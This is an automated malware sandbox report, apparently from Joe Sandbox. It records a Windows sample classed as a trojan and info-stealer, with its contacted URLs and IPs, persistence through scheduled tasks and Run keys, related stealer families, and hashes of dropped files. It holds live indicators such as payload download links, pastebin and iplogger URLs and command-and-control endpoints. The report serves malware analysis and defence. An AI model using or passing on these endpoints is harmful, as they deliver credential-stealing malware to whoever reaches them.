https://crashpad.chromium.org/	l9eBjdHLCrnnkZZKJdDffPtE.exe.45.dr	false
https://redir.opera.com/uninstallsurvey/	l9eBjdHLCrnnkZZKJdDffPtE.exe.45.dr	false
https://addons.opera.com/en/extensions/details/dify-cashback/	l9eBjdHLCrnnkZZKJdDffPtE.exe.45.dr	false
https://junglethomas.com/iV	NewB.exe, 00000017.00000003.2332265607.0000000000F84000.00000004.00000020.00020000.00000000.sdmp, NewB.exe, 00000017.00000003.2332141365.0000000000F84000.00000004.00000020.00020000.00000000.sdmp	false
http://pesterbdd.com/images/Pester.png	powershell.exe, 00000008.00000002.2329069895.000001A30C6D9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2329069895.000001A30DD30000.00000004.00000800.00020000.00000000.sdmp	false
https://autoupdate.geo.opera.com/geolocation/	l9eBjdHLCrnnkZZKJdDffPtE.exe.45.dr	false
http://schemas.xmlsoap.org/soap/encoding/	powershell.exe, 00000008.00000002.2329069895.000001A30C6D9000.00000004.00000800.00020000.00000000.sdmp	false
http://www.apache.org/licenses/LICENSE-2.0.html	powershell.exe, 00000008.00000002.2329069895.000001A30C6D9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2329069895.000001A30DD30000.00000004.00000800.00020000.00000000.sdmp	false
https://crashstats-collector.opera.com/collector/submit	l9eBjdHLCrnnkZZKJdDffPtE.exe.45.dr	false
https://junglethomas.com/qV	NewB.exe, 00000017.00000003.2332265607.0000000000F84000.00000004.00000020.00020000.00000000.sdmp, NewB.exe, 00000017.00000003.2332141365.0000000000F84000.00000004.00000020.00020000.00000000.sdmp	false
http://www.opera.com0	l9eBjdHLCrnnkZZKJdDffPtE.exe.45.dr	false
https://contoso.com/Icon	powershell.exe, 00000008.00000002.2329069895.000001A30DD83000.00000004.00000800.00020000.00000000.sdmp	false
https://aka.ms/winsvr-2022-pshelpX	powershell.exe, 00000008.00000002.2329069895.000001A30DAD6000.00000004.00000800.00020000.00000000.sdmp	false
https://g.live.com/odclientsettings/ProdV21C:	svchost.exe, 00000013.00000003.2285131926.0000025E535F0000.00000004.00000800.00020000.00000000.sdmp	false
https://opera.com/privacy	l9eBjdHLCrnnkZZKJdDffPtE.exe.45.dr	false
https://legal.opera.com/eula/computers	l9eBjdHLCrnnkZZKJdDffPtE.exe.45.dr	false
https://gamemaker.io)	l9eBjdHLCrnnkZZKJdDffPtE.exe.45.dr	false
https://github.com/Pester/Pester	powershell.exe, 00000008.00000002.2329069895.000001A30C6D9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2329069895.000001A30DD30000.00000004.00000800.00020000.00000000.sdmp	false
http://autoupdate-staging.services.ams.osa/v4/v5/netinstaller///windows/x64v2/Fetching	l9eBjdHLCrnnkZZKJdDffPtE.exe.45.dr	false
https://sourcecode.opera.com	l9eBjdHLCrnnkZZKJdDffPtE.exe.45.dr	false
https://pastebin.com/raw/V6VJsrV31https://yip.su/RNWPd.exe7https://iplogger.com/1djqU4	Uni400uni.exe, 00000028.00000002.3022619723.0000025500041000.00000004.00000800.00020000.00000000.sdmp	false
https://www.whatsapp.com/legal;	l9eBjdHLCrnnkZZKJdDffPtE.exe.45.dr	false
http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t	ISetup8.exe, 00000023.00000003.3016446842.0000000005C48000.00000004.00000020.00020000.00000000.sdmp	false
https://parrotflight.com/4767d2e713f2021e8fe856e3ea638b58.exe	NewB.exe, 00000017.00000003.2332224399.0000000000FBF000.00000004.00000020.00020000.00000000.sdmp	false
https://yip.su/RNWPd.exeChttps://pastebin.com/raw/E0rY26ni5https://iplogger.com/1lyxz	file300un.exe, 00000027.00000002.3456932485.0000027AB9251000.00000004.00000800.00020000.00000000.sdmp	false
https://economicscreateojsu.shop/api	RegAsm.exe, 00000015.00000002.2650906169.00000000033BE000.00000004.00000800.00020000.00000000.sdmp	false
https://g.live.com/odclientsettings/Prod1C:	svchost.exe, 00000013.00000003.2285131926.0000025E5364E000.00000004.00000800.00020000.00000000.sdmp	false
https://economicscreateojsu.shop/	RegAsm.exe, 00000015.00000002.2567701880.0000000001250000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000015.00000002.2567701880.00000000012B1000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000015.00000002.2650906169.00000000033B0000.00000004.00000800.00020000.00000000.sdmp	false
https://affordcharmcropwo.shop/api	RegAsm.exe, 0000001D.00000002.2670127283.0000000001375000.00000004.00000020.00020000.00000000.sdmp	false
https://www.opera.com..	l9eBjdHLCrnnkZZKJdDffPtE.exe.45.dr	false
https://www.opera.com/	l9eBjdHLCrnnkZZKJdDffPtE.exe.45.dr	false
https://affordcharmcropwo.shop/apiW	RegAsm.exe, 0000001D.00000002.3031292972.000000000357A000.00000004.00000800.00020000.00000000.sdmp	false
https://economicscreateojsu.shop:443/api	RegAsm.exe, 00000015.00000002.2567701880.0000000001250000.00000004.00000020.00020000.00000000.sdmp	false
http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#	ISetup8.exe, 00000023.00000003.3016446842.0000000005C48000.00000004.00000020.00020000.00000000.sdmp	false
https://economicscreateojsu.shop/apip	RegAsm.exe, 00000015.00000002.2650906169.00000000033BE000.00000004.00000800.00020000.00000000.sdmp	false
http://schemas.xmlsoap.org/wsdl/	powershell.exe, 00000008.00000002.2329069895.000001A30C6D9000.00000004.00000800.00020000.00000000.sdmp	false
https://gamemaker.io/en/get.	l9eBjdHLCrnnkZZKJdDffPtE.exe.45.dr	false
https://gamemaker.io	l9eBjdHLCrnnkZZKJdDffPtE.exe.45.dr	false
https://affordcharmcropwo.shop/apiA	RegAsm.exe, 0000001D.00000002.3031292972.0000000003570000.00000004.00000800.00020000.00000000.sdmp	false
https://legal.opera.com/privacy	l9eBjdHLCrnnkZZKJdDffPtE.exe.45.dr	false
http://download.iolo.net	ISetup8.exe, 00000023.00000003.3016446842.000000000585C000.00000004.00000020.00020000.00000000.sdmp	false
https://help.instagram.com/581066165581870;	l9eBjdHLCrnnkZZKJdDffPtE.exe.45.dr	false
https://aka.ms/pscore68	powershell.exe, 00000008.00000002.2329069895.000001A30C4B1000.00000004.00000800.00020000.00000000.sdmp	false
https://features.opera-api2.com/api/v2/features?country=%s&language=%s&uuid=%s&product=%s&channel=%s	l9eBjdHLCrnnkZZKJdDffPtE.exe.45.dr	false
https://affordcharmcropwo.shop/	RegAsm.exe, 0000001D.00000002.2663231938.0000000001348000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000001D.00000002.3031292972.000000000357A000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000001D.00000002.2648072968.00000000012C8000.00000004.00000020.00020000.00000000.sdmp	false
https://junglethomas.com/	NewB.exe, 00000017.00000003.2353346772.0000000000F77000.00000004.00000020.00020000.00000000.sdmp, NewB.exe, 00000017.00000003.2332265607.0000000000F84000.00000004.00000020.00020000.00000000.sdmp, NewB.exe, 00000017.00000003.2332141365.0000000000F84000.00000004.00000020.00020000.00000000.sdmp	false
https://legal.opera.com/privacy.	l9eBjdHLCrnnkZZKJdDffPtE.exe.45.dr	false

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
185.172.128.90	unknown	Russian Federation	50916	NADYMSS-ASRU	false
172.67.181.34	unknown	United States	13335	CLOUDFLARENETUS	false
185.215.113.45	unknown	Portugal	206894	WHOLESALECONNECTIONSNL	false
185.215.113.67	unknown	Portugal	206894	WHOLESALECONNECTIONSNL	false
193.233.132.175	unknown	Russian Federation	2895	FREE-NET-ASFREEnetEU	false
185.172.128.33	unknown	Russian Federation	50916	NADYMSS-ASRU	true
185.172.128.59	unknown	Russian Federation	50916	NADYMSS-ASRU	false
104.208.16.94	unknown	United States	8075	MICROSOFT-CORP-MSN-AS-BLOCKUS	false
104.21.79.77	unknown	United States	13335	CLOUDFLARENETUS	false
88.218.93.76	unknown	Netherlands	18978	ENZUINC-US	false
104.21.31.124	unknown	United States	13335	CLOUDFLARENETUS	false
94.232.247.248	unknown	Lithuania	208485	EKSENBILISIMTR	false
104.21.90.14	unknown	United States	13335	CLOUDFLARENETUS	false
23.62.134.148	unknown	United States	16625	AKAMAI-ASUS	false
52.2.56.64	unknown	United States	14618	AMAZON-AESUS	false
185.215.113.32	unknown	Portugal	206894	WHOLESALECONNECTIONSNL	true
185.172.128.228	unknown	Russian Federation	50916	NADYMSS-ASRU	false
172.67.176.131	unknown	United States	13335	CLOUDFLARENETUS	false
172.67.187.204	unknown	United States	13335	CLOUDFLARENETUS	false
20.42.65.92	unknown	United States	8075	MICROSOFT-CORP-MSN-AS-BLOCKUS	false
172.67.34.170	unknown	United States	13335	CLOUDFLARENETUS	false
193.233.132.167	unknown	Russian Federation	2895	FREE-NET-ASFREEnetEU	false
185.172.128.19	unknown	Russian Federation	50916	NADYMSS-ASRU	true
104.21.92.190	unknown	United States	13335	CLOUDFLARENETUS	false
172.67.193.79	unknown	United States	13335	CLOUDFLARENETUS	false
104.21.47.60	unknown	United States	13335	CLOUDFLARENETUS	false
5.42.64.17	unknown	Russian Federation	39493	RU-KSTVKolomnaGroupofcompaniesGuarantee-tvRU	false
104.20.67.143	unknown	United States	13335	CLOUDFLARENETUS	false
107.167.110.211	unknown	United States	21837	OPERASOFTWAREUS	false

Private

IP
127.0.0.1

General Information

Joe Sandbox version:	40.0.0 Tourmaline
Analysis ID:	1425954
Start date and time:	2024-04-15 07:40:54 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 18m 46s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	53
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	bUWKfj04aU.exe renamed because original name is a hash value
Original Sample Name:	b9a582f60e89571526c4a6dacbb6a576.exe
Detection:	MAL
Classification:	mal100.phis.troj.spyw.expl.evad.winEXE@170/306@0/30
EGA Information:	Successful, ratio: 88.9%
HCA Information:	Successful, ratio: 76% Number of executed functions: 114 Number of non-executed functions: 160
Cookbook Comments:	Found application associated with file extension: .exe Override analysis time to 240s for rundll32

Warnings

Exclude process from analysis (whitelisted): Conhost.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
Execution Graph export aborted for target powershell.exe, PID 4904 because it is empty
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing behavior information.
Report size getting too big, too many NtAllocateVirtualMemory calls found.
Report size getting too big, too many NtCreateKey calls found.
Report size getting too big, too many NtDeviceIoControlFile calls found.
Report size getting too big, too many NtEnumerateKey calls found.
Report size getting too big, too many NtOpenFile calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtReadVirtualMemory calls found.
Report size getting too big, too many NtSetInformationFile calls found.
Skipping network analysis since amount of network traffic is too extensive

Simulations

Behavior and APIs

Time	Type	Description
07:41:46	Task Scheduler	Run new task: explorgu path: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe
07:41:49	API Interceptor	2838x Sleep call for process: explorgu.exe modified
07:42:00	API Interceptor	33x Sleep call for process: powershell.exe modified
07:42:01	API Interceptor	2x Sleep call for process: svchost.exe modified
07:42:04	API Interceptor	12x Sleep call for process: RegAsm.exe modified
07:42:04	API Interceptor	1527x Sleep call for process: NewB.exe modified
07:42:06	Task Scheduler	Run new task: NewB.exe path: C:\Users\user\AppData\Local\Temp\1001059001\NewB.exe
07:42:16	API Interceptor	2x Sleep call for process: WerFault.exe modified
07:42:24	API Interceptor	1x Sleep call for process: FirstZ.exe modified
07:42:24	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run random.exe C:\Users\user\AppData\Local\Temp\1001084001\random.exe
07:42:32	API Interceptor	222x Sleep call for process: rundll32.exe modified
07:42:37	API Interceptor	105x Sleep call for process: MSBuild.exe modified
07:42:41	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run random.exe C:\Users\user\AppData\Local\Temp\1001084001\random.exe
07:42:42	API Interceptor	1x Sleep call for process: 4767d2e713f2021e8fe856e3ea638b58.exe modified
07:43:00	API Interceptor	23832627x Sleep call for process: random.exe modified
07:43:24	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run RageMP131 C:\Users\user\AppData\Local\RageMP131\RageMP131.exe

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
185.172.128.90	80OrFCsz0u.exe	Get hash	malicious	GCleaner, Glupteba, LummaC Stealer, Mars Stealer, PureLog Stealer, RedLine, RisePro Stealer	Browse	185.172.128.90/cpa/ping.php?substr=one&s=two
	HCfh46GOiJ.exe	Get hash	malicious	Mars Stealer, PureLog Stealer, Stealc, Vidar, zgRAT	Browse	185.172.128.90/cpa/ping.php?substr=six&s=ab&sub=0
	SecuriteInfo.com.Win64.Evo-gen.28136.30716.exe	Get hash	malicious	GCleaner, Glupteba, LummaC Stealer, Mars Stealer, PureLog Stealer, RedLine, RisePro Stealer	Browse	185.172.128.90/cpa/ping.php?substr=one&s=two
	Mmc1oSyjzD.exe	Get hash	malicious	Mars Stealer, PureLog Stealer, Stealc, Vidar, zgRAT	Browse	185.172.128.90/cpa/ping.php?substr=six&s=ab&sub=0
	file.exe	Get hash	malicious	GCleaner	Browse	185.172.128.90/cpa/ping.php?substr=one&s=two
	lIDTGI3vuC.exe	Get hash	malicious	Mars Stealer, PureLog Stealer, Stealc, Vidar, zgRAT	Browse	185.172.128.90/cpa/ping.php?substr=eight&s=ab&sub=0
	UeeD3Fw2se.exe	Get hash	malicious	Mars Stealer, PureLog Stealer, Stealc, Vidar, zgRAT	Browse	185.172.128.90/cpa/ping.php?substr=six&s=ab&sub=0
	KpBDFs56Xv.exe	Get hash	malicious	Mars Stealer, PureLog Stealer, Stealc, Vidar, zgRAT	Browse	185.172.128.90/cpa/ping.php?substr=three&s=ab&sub=0
	5WNvSSc9Us.exe	Get hash	malicious	Mars Stealer, PureLog Stealer, Stealc, Vidar, zgRAT	Browse	185.172.128.90/cpa/ping.php?substr=eight&s=ab&sub=0
	biJzn18IpC.exe	Get hash	malicious	Mars Stealer, PureLog Stealer, Stealc, Vidar, zgRAT	Browse	185.172.128.90/cpa/ping.php?substr=three&s=ab&sub=0

Domains

⊘No context

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
NADYMSS-ASRU	SecuriteInfo.com.Win32.PWSX-gen.19014.16440.exe	Get hash	malicious	Mars Stealer, Stealc, Vidar	Browse	185.172.128.209
	SecuriteInfo.com.W32.Kryptik.GYGF.tr.25491.32023.exe	Get hash	malicious	Mars Stealer, Stealc, Vidar	Browse	185.172.128.26
	SecuriteInfo.com.W32.Kryptik.GYGF.tr.17036.4908.exe	Get hash	malicious	Mars Stealer, Stealc, Vidar	Browse	185.172.128.209
	SecuriteInfo.com.Win32.CrypterX-gen.15384.21390.exe	Get hash	malicious	Mars Stealer, Stealc, Vidar	Browse	185.172.128.26
	file.exe	Get hash	malicious	Mars Stealer, Stealc, Vidar	Browse	185.172.128.26
	80OrFCsz0u.exe	Get hash	malicious	GCleaner, Glupteba, LummaC Stealer, Mars Stealer, PureLog Stealer, RedLine, RisePro Stealer	Browse	185.172.128.26
	t96YkHCtPM.exe	Get hash	malicious	Mars Stealer, Stealc, Vidar	Browse	185.172.128.26
	dVL68Xm46s.exe	Get hash	malicious	Mars Stealer, Stealc, Vidar	Browse	185.172.128.26
	HCfh46GOiJ.exe	Get hash	malicious	Mars Stealer, PureLog Stealer, Stealc, Vidar, zgRAT	Browse	185.172.128.209
	SecuriteInfo.com.Win64.Evo-gen.28136.30716.exe	Get hash	malicious	GCleaner, Glupteba, LummaC Stealer, Mars Stealer, PureLog Stealer, RedLine, RisePro Stealer	Browse	185.172.128.26

Process:	C:\Windows\System32\svchost.exe
File Type:	Extensible storage user DataBase, version 0x620, checksum 0x3f41fe08, page size 16384, DirtyShutdown, Windows version 10.0
Category:	dropped
Size (bytes):	1310720
Entropy (8bit):	0.7555765462169853
Encrypted:	false
SSDEEP:	1536:NSB2ESB2SSjlK/svFH03N9Jdt8lYkr3g16xj2UPkLk+kLWyrufTRryrUYc//kbxW:NazaSvGJzYj2UlmOlOL
MD5:	438632BD24026A2BC0DD9A9A05CFD2F6
SHA1:	A3CDCF7B057CAC4771119C0A969BCB878E215423
SHA-256:	7B1A631427C63463887FD05AB96B0126C9127A4EA753047DC3618F76D1021D57
SHA-512:	722AED5FFA63B020C04F933EFC71DEECDA4A105DDDC9B317349EF3AC3485597DFED9C2FE90ADB5EE4BEC7CE746046F8F2030F620B2C0D5E43561E04C94E7625A
Malicious:	false
Reputation:	unknown
Preview:	?A..... .......7.......X\...;...{......................0.e......!...{?.....\|..h.g.........................D./..;...{..........................................................................................................eJ......n....@...................................................................................................... .......9....{...............................................................................................................................................................................................2...{...................................g.....\|.......................*...\|M..........................#......h.g.....................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_Uni400uni.exe_abcc73dc4be9eccf93f57939ad34e24e865bf25_72d372f9_edad4638-018d-4178-8ee1-0f05c5001308\Report.wer

Download File

Process:	C:\Windows\System32\WerFault.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	1.0099962770073498
Encrypted:	false
SSDEEP:	192:vd/FopvzA6OJz0UnUNmWaWTO8mDzuiFPZ24lO86Q:FdohsrJgUnUNmWaiO80zuiFPY4lO86Q
MD5:	2E1081C6F66AAB51414CC475C364520B
SHA1:	8F2A1F05F492CEF55C9F5DA1837753C45DBF2A7A
SHA-256:	E2684651EBAA0C9699FB8D184884E0CC2D8FACD152A2C23E654E3037CF8F385E
SHA-512:	6529C98BF6CD23993A1736369F95866F7F754049D0D9F50A584D2635BED52642B8EB9F7F6AD099B7CC84C7EAB6C57A4D0E55155D8C2AE03BC3C2B871A40F22F7
Malicious:	false
Reputation:	unknown
Preview:	..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.5.7.6.3.3.3.5.0.9.3.4.4.8.1.5.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.5.7.6.3.3.3.6.0.2.6.9.5.7.5.6.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.e.d.a.d.4.6.3.8.-.0.1.8.d.-.4.1.7.8.-.8.e.e.1.-.0.f.0.5.c.5.0.0.1.3.0.8.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.2.0.b.3.b.e.b.3.-.2.5.2.7.-.4.9.5.a.-.a.e.8.1.-.b.6.b.f.d.e.5.0.f.a.a.5.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....N.s.A.p.p.N.a.m.e.=.U.n.i.4.0.0.u.n.i...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.I.m.o.s.a.s.o.f.a.n.e.f.o.z.i.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.e.0.4.-.0.0.0.1.-.0.0.1.5.-.4.f.4.4.-.d.0.b.0.f.7.8.e.d.a.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.1.1.a.4.3.3.6.d.7.1.8.3.1.b.d.a.7.b.1.9.b.6.8.6.8.9.4.2.1.c.4.e.0.0.0.0.0.0.0.0.!.0.0.0.0.b.3.3.a.1.5.b.4.7.c.3.b.9.9.c.6.5.f.2.2.7.7.5.6.2.a.9.2.8.b.f.9.c.e.9.d.a.b.f.7.!.U.n.i.4.0.0.u.n.

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_swiiiii.exe_4644a13ebcdb6e10e65a72b8ec8bc0b0ff32d1fa_6563360f_0de07880-8bf4-4e90-a473-63681402adc2\Report.wer

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	0.9273635752001405
Encrypted:	false
SSDEEP:	192:RpKnVSuX6c0BU/fGFaGszuiF0Z24IO8ld:PAYuX6XBU/fGFadzuiF0Y4IO8ld
MD5:	3077C57D2B521A0D7717D6520D1F363C
SHA1:	BBE16492C40A52CBC3645735524270C06135D1B3
SHA-256:	3E6F3B18000C8EB625DEB4DFECCBD13872447CA193F37CC9F34DB30D6F18B307
SHA-512:	8217BFF1BCFCFE1982E099EC553CFCABA1B489399EEB8E8E7D281A6E4DA156D5731A2D0398D44058A4EEA386BD27B1F003E877BE54A0FD2F5A93446FE94688ED
Malicious:	false
Reputation:	unknown
Preview:	..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.5.7.6.3.3.3.2.8.1.5.6.3.8.5.3.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.5.7.6.3.3.3.2.9.4.6.8.8.7.8.4.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.0.d.e.0.7.8.8.0.-.8.b.f.4.-.4.e.9.0.-.a.4.7.3.-.6.3.6.8.1.4.0.2.a.d.c.2.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.e.4.6.5.5.e.e.5.-.d.0.0.b.-.4.2.2.5.-.8.e.8.b.-.1.f.3.8.8.b.a.3.4.c.0.a.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.s.w.i.i.i.i.i...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.C.M.S.T.P...E.X.E.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.5.b.c.-.0.0.0.1.-.0.0.1.5.-.7.0.5.3.-.d.7.a.6.f.7.8.e.d.a.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.6.f.4.0.2.9.a.9.7.d.3.e.3.4.2.c.a.a.8.8.8.2.3.7.5.d.c.b.c.2.b.1.0.0.0.0.0.9.0.4.!.0.0.0.0.3.3.a.e.d.a.d.b.5.3.6.1.f.1.6.4.6.c.f.f.d.6.8.7.9.1.d.7.2.b.a.5.f.1.4.2.4.1.1.4.!.

C:\ProgramData\Microsoft\Windows\WER\Temp\WER37A4.tmp.dmp

Download File

Process:	C:\Windows\System32\WerFault.exe
File Type:	Mini DuMP crash report, 16 streams, Mon Apr 15 05:42:34 2024, 0x1205a4 type
Category:	dropped
Size (bytes):	417007
Entropy (8bit):	3.306157410760698
Encrypted:	false
SSDEEP:	3072:KKKrAo3+vMoUhHq4oifIVlwcS8quiPe1CCqZu:vsV3QxHdycDqM
MD5:	2721317D161304E2E9319BF1DDB283FC
SHA1:	E55000FE87F812174CABD94D783D2397015F7E44
SHA-256:	AFF0DE60D29D4701478BE1BA27984858B411701E57D37692BDB8EF703034E4EA
SHA-512:	B2BF94D05F99CCD55B9D874C5DB1F9739AEDD3826E0FC864719FD286723F8C95B205F5B6DC00AEF038170698754D9D0D3BB67C2B2F6A3B13C9978504E796254F
Malicious:	false
Reputation:	unknown
Preview:	MDMP..a..... .......J..f............................4.......$...4.......D...X.......tG..~y..........l.......8...........T...........@*...2...........7...........9..............................................................................eJ...... :......Lw......................T...........?..f.............................0..................W... .E.u.r.o.p.e. .S.t.a.n.d.a.r.d. .T.i.m.e.......................................W... .E.u.r.o.p.e. .S.u.m.m.e.r. .T.i.m.e...........................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...........................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\WER\Temp\WER491A.tmp.WERInternalMetadata.xml

Download File

Process:	C:\Windows\System32\WerFault.exe
File Type:	XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	8572
Entropy (8bit):	3.705716894905635
Encrypted:	false
SSDEEP:	192:R6l7wVeJYEp6Yw36ek+pgmfbLPpra89bwsqfiCQm:R6lXJ7p6YI6efpgmfbLxwpfik
MD5:	E93EE8EA3C3DD4B4A01094645BBAD16C
SHA1:	F3C0018D99E9467834968961105A84B6D725D78C
SHA-256:	2D059DAB299A408B696798E67A88F19DB3DA0C159E9D072AFF8445FFC2A6E736
SHA-512:	72995560F4E23A7B45947641B91FB47A08FF5718BC445BC9F4864AE4612B14A99B3DB45406C56FF192F6F02C516254C43CE91A83B19E2D5C91497BC9B707CAA5
Malicious:	false
Reputation:	unknown
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.7.6.8.4.<./.P.i.

C:\ProgramData\Microsoft\Windows\WER\Temp\WER4B0F.tmp.xml

Download File

Process:	C:\Windows\System32\WerFault.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4762
Entropy (8bit):	4.505801804170183
Encrypted:	false
SSDEEP:	48:cvIwWl8zs1Jg771I9TgWpW8VY+Ym8M4JPDFHpVyq858fxZhhVd:uIjfPI7sZ7VuJ1TNzhhVd
MD5:	A233CCACB574B1E7581EE59D6D45CDE0
SHA1:	7D146F433A10F60D1CE3477DD7E8988437425571
SHA-256:	7D845F5AEAA99FEA0663D126D4064C9D7379B60F1F7FC05B01300226CF7E5348
SHA-512:	C57CAD6E82467A82AA5CB56B0E8C540AB682CE10175D0A5AE31D1B6CD30BD635DB57B7884345E89B911C74FBDBDE015240BB26E731D879A10CA7A7B9DE9C8BCE
Malicious:	false
Reputation:	unknown
Preview:	<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="280605" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

C:\ProgramData\Microsoft\Windows\WER\Temp\WERDD9D.tmp.dmp

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Mini DuMP crash report, 15 streams, Mon Apr 15 05:42:08 2024, 0x1205a4 type
Category:	dropped
Size (bytes):	172213
Entropy (8bit):	3.9260071009382473
Encrypted:	false
